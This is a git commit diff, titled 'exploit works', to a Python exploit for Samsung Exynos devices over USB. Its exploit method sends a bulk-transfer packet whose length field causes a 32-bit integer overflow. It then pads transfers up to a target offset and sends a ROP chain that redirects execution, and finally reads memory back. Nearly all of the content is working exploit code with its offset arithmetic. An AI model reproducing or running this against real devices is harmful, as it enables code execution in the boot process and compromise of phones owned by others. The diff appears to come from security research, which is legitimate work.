exploit works

Eljakim Herrewijnen 2024-07-15 23:26:23 +02:00
parent 445c52acb4
commit ead9a8a197


@ -90,37 +90,60 @@ class ExynosDevice():
def exploit(self, payload: bytes): def exploit(self, payload: bytes):
current_offset = TARGET_OFFSETS[self.target][0] current_offset = TARGET_OFFSETS[self.target][0]
transfered = 0
transferred = ctypes.c_int() transferred = ctypes.c_int()
max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
max_payload_size = 0x100000000 - size_to_overflow
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
payload = payload + ((max_payload_size - len(payload)) * b"\x00") payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload" assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug # First send payload to trigger the bug
bug_payload = p32(0) + p32(0xfdfde800) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) # dummy packet for triggering the bug bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload" assert res == 0, "Error triggering payload"
current_offset += len(bug_payload) assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
# Send the actual payload # Send the actual payload
transfered = 0 # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) # assert res == 0, "Error sending payload"
assert res == 0, "Error sending payload" # current_offset += len(payload)
current_offset += len(payload) cnt = 0
while True: while True:
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][2]: if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
break break
self.send_empty_transfer() self.send_empty_transfer()
current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
rop_chain = p64(TARGET_OFFSETS[self.target][0]) * (8 // CHUNK_SIZE) remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
# Should
transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
buf = ctypes.c_buffer(b"", 0x200000)
transfered = 0 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
buf = ctypes.c_buffer(b"", 0x20000)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 10000)
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0] padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]